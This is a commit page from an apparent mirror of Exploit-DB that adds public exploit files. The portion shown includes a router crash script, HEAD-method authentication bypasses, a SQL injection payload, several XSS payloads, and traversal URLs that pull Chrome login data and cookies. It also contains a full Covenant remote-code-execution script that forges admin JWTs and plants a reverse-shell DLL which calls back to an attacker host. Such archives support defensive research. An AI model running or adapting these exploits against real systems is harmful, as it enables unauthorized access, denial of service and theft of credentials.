bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2023-03-31

Browse source 
22 changes to exploits/shellcodes/ghdb

LISTSERV 17 - Insecure Direct Object Reference (IDOR)
LISTSERV 17 - Reflected Cross Site Scripting (XSS)

Router ZTE-H108NS - Stack Buffer Overflow (DoS)

Router ZTE-H108NS - Authentication Bypass

Boa Web Server v0.94.14 - Authentication Bypass

Covenant v0.5 - Remote Code Execution (RCE)

Dreamer CMS v4.0.0 - SQL Injection

Shoplazza 1.1 - Stored Cross-Site Scripting (XSS)

Virtual Reception v1.0 - Web Server Directory Traversal

4images 1.9 - Remote Command Execution (RCE)

ClicShopping v3.402 - Cross-Site Scripting (XSS)

Concrete5 CME v9.1.3 - Xpath injection

Device Manager Express 7.8.20002.47752 - Remote Code Execution (RCE)

Ecommerse v1.0 - Cross-Site Scripting (XSS)

Eve-ng 5.0.1-13 - Stored Cross-Site Scripting (XSS)

myBB forums 1.8.26 - Stored Cross-Site Scripting (XSS)

WPForms 1.7.8 - Cross-Site Scripting (XSS)

CrowdStrike Falcon AGENT  6.44.15806  - Uninstall without Installation Token

Lavasoft web companion 4.1.0.409 - 'DCIservice' Unquoted Service Path

Zillya Total Security 3.0.2367.0  - Local Privilege Escalation
This commit is contained in:
Exploit-DB 2023-03-31 00:16:26 +00:00
parent 564d2ddf47
commit 42ade901fe
22 changed files with 1780 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

20
exploits/cgi/webapps/51148.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: LISTSERV 17 - Reflected Cross Site Scripting (XSS)
# Google Dork: inurl:/scripts/wa.exe
# Date: 12/01/2022
# Exploit Author: Shaunt Der-Grigorian
# Vendor Homepage: https://www.lsoft.com/
# Software Link: https://www.lsoft.com/download/listserv.asp
# Version: 17
# Tested on: Windows Server 2019
# CVE : CVE-2022-39195
A reflected cross-site scripting (XSS) vulnerability in the LISTSERV 17 web interface allows remote attackers to inject arbitrary JavaScript or HTML via the "c" parameter.
To reproduce, please visit
http://localhost/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(1)%3C/script%3E
(or whichever URL you can use for testing instead of localhost).
The "c" parameter will reflect any value given onto the page.
# Solution
This vulnerability can be mitigated by going under "Server Administration" to "Web Templates" and editing the BODY-LCMD-MESSAGE web template. Change &+CMD; to &+HTMLENCODE(&+CMD;); .

17
exploits/cgi/webapps/51149.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: LISTSERV 17 - Insecure Direct Object Reference (IDOR)
# Google Dork: inurl:/scripts/wa.exe
# Date: 12/02/2022
# Exploit Author: Shaunt Der-Grigorian
# Vendor Homepage: https://www.lsoft.com/
# Software Link: https://www.lsoft.com/download/listserv.asp
# Version: 17
# Tested on: Windows Server 2019
# CVE : CVE-2022-40319
# Steps to replicate
1. Create two accounts on your LISTSERV 17 installation, logging into each one in a different browser or container.
2. Intercept your attacking profile's browser traffic using Burp.
3. When logging in, you'll be taken to a URL with your email address in the Y parameter (i.e. http://example.com/scripts/wa.exe?INDEX&X=[session-id]&Y=[email-address]).
4. Click on your email address on the top right and select "Edit profile".
5. In Burp, change the email address in the URL's Y parameter to the email address of your victim account.
4. Next, the "WALOGIN" cookie value will be an ASCII encoded version of your email address. Using Burp Decoder, ASCII encode your victim's email address and replace the "WALOGIN" cookie value with that.5. Submit this request. You should now be accessing/editing the victim's profile. You can make modifications and access any information in this profile as long as you replace those two values in Burp for each request.

49
exploits/hardware/dos/51137.py Executable file
View file

@ -0,0 +1,49 @@
# Exploit Title: ZTE-H108NS - Stack Buffer Overflow (DoS)
# Date: 19-11-2022
# Exploit Author: George Tsimpidas
# Vendor: https://www.zte.com.cn/global/
# Firmware: H108NSV1.0.7u_ZRD_GR2_A68
# Usage: python zte-exploit.py <victim-ip> <port>
# CVE: N/A
# Tested on: Debian 5.18.5
#!/usr/bin/python3
import sys
import socket
from time import sleep
host = sys.argv[1] # Recieve IP from user
port = int(sys.argv[2]) # Recieve Port from user
junk = b"1500Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae"
* 5
buffer = b"GET /cgi-bin/tools_test.asp?testFlag=1&Test_PVC=0&pingtest_type=Yes&IP=192.168.1.1"
+ junk + b"&TestBtn=START HTTP/1.1\r\n"
buffer += b"Host: 192.168.1.1\r\n"
buffer += b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0)
Gecko/20100101 Firefox/91.0\r\n"
buffer += b"Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
buffer += b"Accept-Language: en-US,en;q=0.5\r\n"
buffer += b"Accept-Encoding: gzip, deflate\r\n"
buffer += b"Authorization: Basic YWRtaW46YWRtaW4=\r\n"
buffer += b"Connection: Keep-Alive\r\n"
buffer += b"Cookie:
SID=21caea85fe39c09297a2b6ad4f286752fe47e6c9c5f601c23b58432db13298f2;
_TESTCOOKIESUPPORT=1; SESSIONID=53483d25\r\n"
buffer += b"Upgrade-Insecure-Requests: 1\r\n\r\n"
print("[*] Sending evil payload...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(buffer)
sleep(1)
s.close()
print("[+] Crashing boom boom ~ check if target is down ;)")

35
exploits/hardware/remote/51138.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: Router ZTE-H108NS - Authentication Bypass
# Date: 19-11-2022
# Exploit Author: George Tsimpidas
# Vendor: https://www.zte.com.cn/global/
# Firmware: H108NSV1.0.7u_ZRD_GR2_A68
# CVE: N/A
# Tested on: Debian 5.18.5
Description :
When specific http methods are listed within a security constraint,
then only those
methods are protected. Router ZTE-H108NS defines the following http
methods: GET, POST, and HEAD. HEAD method seems to fall under a flawed
operation which allows the HEAD to be implemented correctly with every
Response Status Code.
Proof Of Concept :
Below request bypasses successfully the Basic Authentication, and
grants access to the Administration Panel of the Router.
HEAD /cgi-bin/tools_admin.asp HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: SESSIONID=1cd6bb77
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

75
exploits/linux/webapps/51139.txt Normal file
View file

@ -0,0 +1,75 @@
# Exploit Title: Boa Web Server v0.94.14 - Authentication Bypass
#Date: 19-11-2022
# Exploit Author: George Tsimpidas
# Vendor: https://github.com/gpg/boa
# CVE: N/A
# Tested on: Debian 5.18.5
Description :
Boa Web Server Versions from 0.94.13 - 0.94.14 fail to validate the
correct security constraint on the HEAD http method allowing everyone
to bypass the Basic Authorization Mechanism.
Culprit :
if (!memcmp(req->logline, "GET ", 4))
req->method = M_GET;
else if (!memcmp(req->logline, "HEAD ", 5))
/* head is just get w/no body */
req->method = M_HEAD;
else if (!memcmp(req->logline, "POST ", 5))
req->method = M_POST;
else {
log_error_doc(req);
fprintf(stderr, "malformed request: \"%s\"\n", req->logline);
send_r_not_implemented(req);
return 0;
}
The req->method = M_HEAD; is being parsed directly on the response.c
file, looking at how the method is being implemented for one of the
response codes :
/* R_NOT_IMP: 505 */
void send_r_bad_version(request * req)
{
SQUASH_KA(req);
req->response_status = R_BAD_VERSION;
if (!req->simple) {
req_write(req, "HTTP/1.0 505 HTTP Version Not Supported\r\n");
print_http_headers(req);
req_write(req, "Content-Type: " HTML "\r\n\r\n"); /* terminate
header */
}
if (req->method != M_HEAD) {
req_write(req,
"<HTML><HEAD><TITLE>505 HTTP Version Not
Supported</TITLE></HEAD>\n"
"<BODY><H1>505 HTTP Version Not Supported</H1>\nHTTP
versions "
"other than 0.9 and 1.0 "
"are not supported in Boa.\n<p><p>Version encountered: ");
req_write(req, req->http_version);
req_write(req, "<p><p></BODY></HTML>\n");
}
req_flush(req);
}
Above code condition indicates that if (req->method != M_HEAD) therefore
if the the requested method does not equal to M_HEAD then
req_write(req,
"<HTML><HEAD><TITLE>505 HTTP Version Not
Supported</TITLE></HEAD>\n"
"<BODY><H1>505 HTTP Version Not Supported</H1>\nHTTP
versions "
"other than 0.9 and 1.0 "
"are not supported in Boa.\n<p><p>Version encountered: ");
req_write(req, req->http_version);
req_write(req, "<p><p></BODY></HTML>\n");
}
So if the method actually contains the http method of HEAD it's being
passed for every function that includes all the response code methods.

32
exploits/multiple/webapps/51134.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: Dreamer CMS v4.0.0 - SQL Injection
# Date: 2022/10/02
# Exploit Author: lvren
# Vendor Homepage: http://cms.iteachyou.cc/
# Software Link: https://gitee.com/isoftforce/dreamer_cms/repository/archive/v4.0.0.zip
# Version: v4.0.0
# CVE: CVE-2022-43128
Proof Of Concept:
POST /admin/search/doSearch HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
Origin: http://localhost:8888
Connection: close
Referer: http://localhost:8888/admin/search/doSearch
Cookie: dreamer-cms-s=6387e44f-e700-462d-bba5-d4e0ffff5739
Upgrade-Insecure-Requests: 1
entity[typeid']=1) AND (SELECT 2904 FROM (SELECT(SLEEP(5)))TdVL) AND (5386=5386
lvren
lvren@lvre.ntesmail.com
签名由 网易灵犀办公 定制

438
exploits/multiple/webapps/51141.py Executable file
View file

@ -0,0 +1,438 @@
# Exploit Title: Covenant v0.5 - Remote Code Execution (RCE)
# Exploit Author: xThaz
# Author website: https://xthaz.fr/
# Date: 2022-09-11
# Vendor Homepage: https://cobbr.io/Covenant.html
# Software Link: https://github.com/cobbr/Covenant
# Version: v0.1.3 - v0.5
# Tested on: Windows 11 compiled covenant (Windows defender disabled), Linux covenant docker
# Vulnerability
## Discoverer: coastal
## Date: 2020-07-13
## Discoverer website: https://blog.null.farm
## References:
## - https://blog.null.farm/hunting-the-hunters
## - https://github.com/Zeop-CyberSec/covenant_rce/blob/master/covenant_jwt_rce.rb
# !/usr/bin/env python3
# encoding: utf-8
import jwt # pip3 install PyJWT
import json
import warnings
import base64
import re
import random
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from Crypto.Hash import HMAC, SHA256 # pip3 install pycryptodome
from Crypto.Util.Padding import pad
from Crypto.Cipher import AES
from requests import request # pip3 install requests
from subprocess import run
from pwn import remote, context # pip3 install pwntools
from os import remove, urandom
from shutil import which
from urllib.parse import urlparse
from pathlib import Path
from time import time
def check_requirements():
if which("mcs") is None:
print("Please install the mono framework in order to compile the payload.")
print("https://www.mono-project.com/download/stable/")
exit(-1)
def random_hex(length):
alphabet = "0123456789abcdef"
return ''.join(random.choice(alphabet) for _ in range(length))
def request_api(method, token, route, body=""):
warnings.simplefilter('ignore', InsecureRequestWarning)
return request(
method,
f"{args.target}/api/{route}",
json=body,
headers={
"Authorization": f"Bearer {token}",
"Content-Type": "application/json"
},
verify=False
)
def craft_jwt(username, userid=f"{random_hex(8)}-{random_hex(4)}-{random_hex(4)}-{random_hex(4)}-{random_hex(12)}"):
secret_key = '%cYA;YK,lxEFw[&P{2HwZ6Axr,{e&3o_}_P%NX+(q&0Ln^#hhft9gTdm\'q%1ugAvfq6rC'
payload_data = {
"sub": username,
"jti": "925f74ca-fc8c-27c6-24be-566b11ab6585",
"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": userid,
"http://schemas.microsoft.com/ws/2008/06/identity/claims/role": [
"User",
"Administrator"
],
"exp": int(time()) + 360,
"iss": "Covenant",
"aud": "Covenant"
}
token = jwt.encode(payload_data, secret_key, algorithm='HS256')
return token
def get_id_admin(token, json_roles):
id_admin = ""
for role in json_roles:
if role["name"] == "Administrator":
id_admin = role["id"]
print(f"\t[*] Found the admin group id : {id_admin}")
break
else:
print("\t[!] Did not found admin group id, quitting !")
exit(-1)
id_admin_user = ""
json_users_roles = request_api("get", token, f"users/roles").json()
for user_role in json_users_roles:
if user_role["roleId"] == id_admin:
id_admin_user = user_role["userId"]
print(f"\t[*] Found the admin user id : {id_admin_user}")
break
else:
print("\t[!] Did not found admin id, quitting !")
exit(-1)
json_users = request_api("get", token, f"users").json()
for user in json_users:
if user["id"] == id_admin_user:
username_admin = user["userName"]
print(f"\t[*] Found the admin username : {username_admin}")
return username_admin, id_admin_user
else:
print("\t[!] Did not found admin username, quitting !")
exit(-1)
def compile_payload():
if args.os == "windows":
payload = '"powershell.exe", "-nop -c \\"$client = New-Object System.Net.Sockets.TCPClient(\'' + args.lhost + '\',' + args.lport + ');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\""'
else:
payload = '"bash", "-c \\"exec bash -i &>/dev/tcp/' + args.lhost + '/' + args.lport + ' <&1\\""'
dll = """using System;
using System.Reflection;
namespace ExampleDLL{
public class Class1{
public Class1(){
}
public void Main(string[] args){
System.Diagnostics.Process.Start(""" + payload + """);
}
}
}
"""
temp_dll_path = f"/tmp/{random_hex(8)}"
Path(f"{temp_dll_path}.cs").write_bytes(dll.encode())
print(f"\t[*] Writing payload in {temp_dll_path}.cs")
compilo_path = which("mcs")
compilation = run([compilo_path, temp_dll_path + ".cs", "-t:library"])
if compilation.returncode:
print("\t[!] Error when compiling DLL, quitting !")
exit(-1)
print(f"\t[*] Successfully compiled the DLL in {temp_dll_path}.dll")
dll_encoded = base64.b64encode(Path(f"{temp_dll_path}.dll").read_bytes()).decode()
remove(temp_dll_path + ".cs")
remove(temp_dll_path + ".dll")
print(f"\t[*] Removed {temp_dll_path}.cs and {temp_dll_path}.dll")
return dll_encoded
def generate_wrapper(dll_encoded):
wrapper = """public static class MessageTransform {
public static string Transform(byte[] bytes) {
try {
string assemblyBase64 = \"""" + dll_encoded + """\";
var assemblyBytes = System.Convert.FromBase64String(assemblyBase64);
var assembly = System.Reflection.Assembly.Load(assemblyBytes);
foreach (var type in assembly.GetTypes()) {
object instance = System.Activator.CreateInstance(type);
object[] args = new object[] { new string[] { \"\" } };
try {
type.GetMethod(\"Main\").Invoke(instance, args);
}
catch {}
}
}
catch {}
return System.Convert.ToBase64String(bytes);
}
public static byte[] Invert(string str) {
return System.Convert.FromBase64String(str);
}
}"""
return wrapper
def upload_profile(token, wrapper):
body = {
'httpUrls': [
'/en-us/index.html',
'/en-us/docs.html',
'/en-us/test.html'
],
'httpRequestHeaders': [
{'name': 'User-Agent',
'value': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 '
'Safari/537.36'},
{'name': 'Cookie', 'value': 'ASPSESSIONID={GUID}; SESSIONID=1552332971750'}
],
'httpResponseHeaders': [
{'name': 'Server', 'value': 'Microsoft-IIS/7.5'}
],
'httpPostRequest': 'i=a19ea23062db990386a3a478cb89d52e&data={DATA}&session=75db-99b1-25fe4e9afbe58696-320bea73',
'httpGetResponse': '{DATA}',
'httpPostResponse': '{DATA}',
'id': 0,
'name': random_hex(8),
'description': '',
'type': 'HTTP',
'messageTransform': wrapper
}
response = request_api("post", token, "profiles/http", body)
if not response.ok:
print("\t[!] Failed to create the listener profile, quitting !")
exit(-1)
else:
profile_id = response.json().get('id')
print(f"\t[*] Profile created with id {profile_id}")
print("\t[*] Successfully created the listener profile")
return profile_id
def generate_valid_listener_port(impersonate_token, tries=0):
if tries >= 10:
print("\t[!] Tried 10 times to generate a listener port but failed, quitting !")
exit(-1)
port = random.randint(8000, 8250) # TO BE EDITED WITH YOUR TARGET LISTENER PORT
listeners = request_api("get", impersonate_token, "listeners").json()
port_used = []
for listener in listeners:
port_used.append(listener["bindPort"])
if port in port_used:
print(f"\t[!] Port {port} is already taken by another listener, retrying !")
generate_valid_listener_port(impersonate_token, tries + 1)
else:
print(f"\t[*] Port {port} seems free")
return port
def get_id_listener_type(impersonate_token, listener_name):
response = request_api("get", impersonate_token, "listeners/types")
if not response.ok:
print("\t[!] Failed to get the listener type, quitting !")
exit(-1)
else:
for listener_type in response.json():
if listener_type["name"] == listener_name:
print(f'\t[*] Found id {listener_type["id"]} for listener {listener_name}')
return listener_type["id"]
def generate_listener(impersonate_token, profile_id):
listener_port = generate_valid_listener_port(impersonate_token)
listener_name = random_hex(8)
data = {
'useSSL': False,
'urls': [
f"http://0.0.0.0:{listener_port}"
],
'id': 0,
'name': listener_name,
'bindAddress': "0.0.0.0",
'bindPort': listener_port,
'connectAddresses': [
"0.0.0.0"
],
'connectPort': listener_port,
'profileId': profile_id,
'listenerTypeId': get_id_listener_type(impersonate_token, "HTTP"),
'status': 'Active'
}
response = request_api("post", impersonate_token, "listeners/http", data)
if not response.ok:
print("\t[!] Failed to create the listener, quitting !")
exit(-1)
else:
print("\t[*] Successfully created the listener")
listener_id = response.json().get("id")
return listener_id, listener_port
def create_grunt(impersonate_token, data):
stager_code = request_api("put", impersonate_token, "launchers/binary", data).json()["stagerCode"]
if stager_code == "":
stager_code = request_api("post", impersonate_token, "launchers/binary", data).json()["stagerCode"]
if stager_code == "":
print("\t[!] Failed to create the grunt payload, quitting !")
exit(-1)
print("\t[*] Successfully created the grunt payload")
return stager_code
def get_grunt_config(impersonate_token, listener_id):
data = {
'id': 0,
'listenerId': listener_id,
'implantTemplateId': 1,
'name': 'Binary',
'description': 'Uses a generated .NET Framework binary to launch a Grunt.',
'type': 'binary',
'dotNetVersion': 'Net35',
'runtimeIdentifier': 'win_x64',
'validateCert': True,
'useCertPinning': True,
'smbPipeName': 'string',
'delay': 0,
'jitterPercent': 0,
'connectAttempts': 0,
'launcherString': 'GruntHTTP.exe',
'outputKind': 'consoleApplication',
'compressStager': False
}
stager_code = create_grunt(impersonate_token, data)
aes_key = re.search(r'FromBase64String\(@\"(.[A-Za-z0-9+\/=]{40,50}?)\"\);', stager_code)
guid_prefix = re.search(r'aGUID = @"(.{10}[0-9a-f]?)";', stager_code)
if not aes_key or not guid_prefix:
print("\t[!] Failed to retrieve the grunt configuration, quitting !")
exit(-1)
aes_key = aes_key.group(1)
guid_prefix = guid_prefix.group(1)
print(f"\t[*] Found the grunt configuration {[aes_key, guid_prefix]}")
return aes_key, guid_prefix
def aes256_cbc_encrypt(key, message):
iv_bytes = urandom(16)
key_decoded = base64.b64decode(key)
encoded_message = pad(message.encode(), 16)
cipher = AES.new(key_decoded, AES.MODE_CBC, iv_bytes)
encrypted = cipher.encrypt(encoded_message)
hmac = HMAC.new(key_decoded, digestmod=SHA256)
signature = hmac.update(encrypted).digest()
return encrypted, iv_bytes, signature
def trigger_exploit(listener_port, aes_key, guid):
message = "<RSAKeyValue><Modulus>tqwoOYfwOkdfax+Er6P3leoKE/w5wWYgmb/riTpSSWCA6T2JklWrPtf9z3s/k0wIi5pX3jWeC5RV5Y/E23jQXPfBB9jW95pIqxwhZ1wC2UOVA8eSCvqbTpqmvTuFPat8ek5piS/QQPSZG98vLsfJ2jQT6XywRZ5JgAZjaqmwUk/lhbUedizVAnYnVqcR4fPEJj2ZVPIzerzIFfGWQrSEbfnjp4F8Y6DjNSTburjFgP0YdXQ9S7qCJ983vM11LfyZiGf97/wFIzXf7pl7CsA8nmQP8t46h8b5hCikXl1waEQLEW+tHRIso+7nBv7ciJ5WgizSAYfXfePlw59xp4UMFQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>"
ciphered, iv, signature = aes256_cbc_encrypt(aes_key, message)
data = {
"GUID": guid,
"Type": 0,
"Meta": '',
"IV": base64.b64encode(iv).decode(),
"EncryptedMessage": base64.b64encode(ciphered).decode(),
"HMAC": base64.b64encode(signature).decode()
}
json_data = json.dumps(data).encode("utf-8")
payload = f"i=a19ea23062db990386a3a478cb89d52e&data={base64.urlsafe_b64encode(json_data).decode()}&session=75db-99b1-25fe4e9afbe58696-320bea73"
if send_exploit(listener_port, "Cookie", guid, payload):
print("\t[*] Exploit succeeded, check listener")
else :
print("\t[!] Exploit failed, retrying")
if send_exploit(listener_port, "Cookies", guid, payload):
print("\t[*] Exploit succeeded, check listener")
else:
print("\t[!] Exploit failed, quitting")
def send_exploit(listener_port, header_cookie, guid, payload):
context.log_level = 'error'
request = f"""POST /en-us/test.html HTTP/1.1\r
Host: {IP_TARGET}:{listener_port}\r
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\r
{header_cookie}: ASPSESSIONID={guid}; SESSIONID=1552332971750\r
Content-Type: application/x-www-form-urlencoded\r
Content-Length: {len(payload)}\r
\r
{payload}
""".encode()
sock = remote(IP_TARGET, listener_port)
sock.sendline(request)
response = sock.recv().decode()
sock.close()
if "HTTP/1.1 200 OK" in response:
return True
else:
return False
if __name__ == "__main__":
check_requirements()
parser = argparse.ArgumentParser()
parser.add_argument("target",
help="URL where the Covenant is hosted, example : https://127.0.0.1:7443")
parser.add_argument("os",
help="Operating System of the target",
choices=["windows", "linux"])
parser.add_argument("lhost",
help="IP of the machine that will receive the reverse shell")
parser.add_argument("lport",
help="Port of the machine that will receive the reverse shell")
args = parser.parse_args()
IP_TARGET = urlparse(args.target).hostname
print("[*] Getting the admin info")
sacrificial_token = craft_jwt("xThaz")
roles = request_api("get", sacrificial_token, "roles").json()
admin_username, admin_id = get_id_admin(sacrificial_token, roles)
impersonate_token = craft_jwt(admin_username, admin_id)
print(f"\t[*] Impersonated {[admin_username]} with the id {[admin_id]}")
print("[*] Generating payload")
dll_encoded = compile_payload()
wrapper = generate_wrapper(dll_encoded)
print("[*] Uploading malicious listener profile")
profile_id = upload_profile(impersonate_token, wrapper)
print("[*] Generating listener")
listener_id, listener_port = generate_listener(impersonate_token, profile_id)
print("[*] Triggering the exploit")
aes_key, guid_prefix = get_grunt_config(impersonate_token, listener_id)
trigger_exploit(listener_port, aes_key, f"{guid_prefix}{random_hex(10)}")

54
exploits/multiple/webapps/51142.txt Normal file
View file

@ -0,0 +1,54 @@
# Exploit Title: Virtual Reception v1.0 - Web Server Directory Traversal
# Exploit Author: Spinae
# Vendor Homepage: https://www.virtualreception.nl/
# Version: win7sp1_rtm.101119-1850 6.1.7601.1.0.65792 running on an Intel NUC5i5RY
# Tested on: all
We discovered the web server of the Virtual Reception appliance is prone to
an unauthenticated directory traversal vulnerability. This allows an
attacker to traverse outside the server root directory by specifying files
at the end of a URL request.
This is a NUC5i5RY
http://[ip address]/c:/WINDOWS/System32/drivers/etc/hosts
http://[ip address]/C:/windows/WindowsUpdate.log
...
A user called 'receptie' exists on the Windows system:
http://[ip address]/c:/users/receptie/ntuser.dat
http://[ip address]/c:/users/receptie/ntuser.ini
http://[ip address]/c:/users/receptie/appdata/local/temp/wmsetup.log
...
http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User
Data/Default/Login Data
http://[ip
address]/c:/users/receptie/AppData/Local/Google/Chrome/User%20Data/Local%20State
http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User
Data/Default/Cookies
...
The appliance also keeps a log of the visitors that register at the
entrance:
http://[ip address]/visitors.csv
hash icon for shodan searches:
https://www.shodan.io/search?query=http.favicon.hash%3A656388049
No reply from the vendor (phone, email, website form submissions), first
reported in 2021.
--
DISCLAIMER: Unless indicated otherwise, the information contained in this
message is privileged and confidential, and is intended only for the use of
the addressee(s) named above and others who have been specifically
authorized to receive it. If you are not the intended recipient, you are
hereby notified that any dissemination, distribution or copying of this
message and/or attachments is strictly prohibited. The company accepts no
liability for any damage caused by any virus transmitted by this message.
Furthermore, the company does not warrant a proper and complete
transmission of this information, nor does it accept liability for any
delays. If you have received this message in error, please contact the
sender and delete the message. Thank you.

67
exploits/multiple/webapps/51150.txt Normal file
View file

@ -0,0 +1,67 @@
# Exploit Title: Shoplazza 1.1 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Andrey Stoykov
# Software Link: https://github.com/Shoplazza/LifeStyle
# Version: 1.1
# Tested on: Ubuntu 20.04
Stored XSS #1:
To reproduce do the following:
1. Login as normal user account
2. Browse "Blog Posts" -> "Manage Blogs" -> "Add Blog Post"
3. Select "Title" and enter payload "><script>alert(1)</script>
// HTTP POST request showing XSS payload
PATCH /admin/api/admin/articles/2dc688b1-ac9e-46d7-8e56-57ded1d45bf5 HTTP/1=
.1
Host: test1205.myshoplaza.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100=
101 Firefox/100.0
[...]
{"article":{"id":"2dc688b1-ac9e-46d7-8e56-57ded1d45bf5","title":"Title\"><s=
cript>alert(1)</script>","excerpt":"Excerpt\"><script>alert(2)</script>","c=
ontent":"<p>\"><script>alert(3)</script></p>"[...]
// HTTP response showing unsanitized XSS payload
HTTP/1.1 200 OK
Content-Type: application/json; charset=3Dutf-8
[...]
{"article":{"title":"Title\"><script>alert(1)</script>","excerpt":"Excerpt\=
"><script>alert(2)</script>","published":true,"seo_title":"Title\"><script>=
alert(1)</script>"[...]
// HTTP GET request to trigger XSS payload
GET /blog/titlescriptalert1script?st=3DeyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9=
.eyJleHAiOjE2NzAzMzE5MzYsInN0b3JlX2lkIjo1MTA0NTksInVzZXJfaWQiOiI4NGY4Nzk4ZC=
03ZGQ1LTRlZGMtYjk3Yy02MWUwODk5ZjM2MDgifQ.9ybPJCtv6Lzf1BlDy-ipoGpXajtl75QdUK=
Enfj9L49I HTTP/1.1
Host: test1205.myshoplaza.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100=
101 Firefox/100.0
[...]
// HTTP response showing unsanitized XSS payload
HTTP/1.1 200 OK
Content-Type: text/html; charset=3DUTF-8
[...]
<meta name=3D"viewport" content=3D"width=3Ddevice-width,initial-scale=3D1,m=
inimum-scale=3D1,maximum-scale=3D1,user-scalable=3Dno,viewport-fit=3Dcover"=
>
<title>Title"><script>alert(1)</script></title>
<meta name=3D"keywords" content=3D"test1205">
[...]
--rehcsed-054bdeb7-e1dc-47b8-a8d3-67ca7da532d2--

56
exploits/php/webapps/51135.txt Normal file
View file

@ -0,0 +1,56 @@
## Title: ClicShopping v3.402 - Cross-Site Scripting (XSS)
## Author: nu11secur1ty
## Date: 11.20.2022
## Vendor: https://www.clicshopping.org/forum/
## Software: https://github.com/ClicShopping/ClicShopping_V3/releases/tag/version3_402
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3
## Description:
The name of an arbitrarily supplied URL parameter is copied into the
value of an HTML tag attribute which is encapsulated in double
quotation marks.
The attacker can trick users to open a very dangerous link or he can
get sensitive information, also he can destroy some components of your
system.
## STATUS: HIGH Vulnerability
[+] Payload:
```js
GET /ClicShopping_V3-version3_402/index.php?Search&AdvancedSearch&bel9c%22onmouseover%3d%22alert(`Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole`)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22zgm9j=1
HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3)
## Proof and Exploit:
[href]()https://streamable.com/rzpgsu
## Time spent
`1:00`
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

173
exploits/php/webapps/51136.txt Normal file
View file

@ -0,0 +1,173 @@
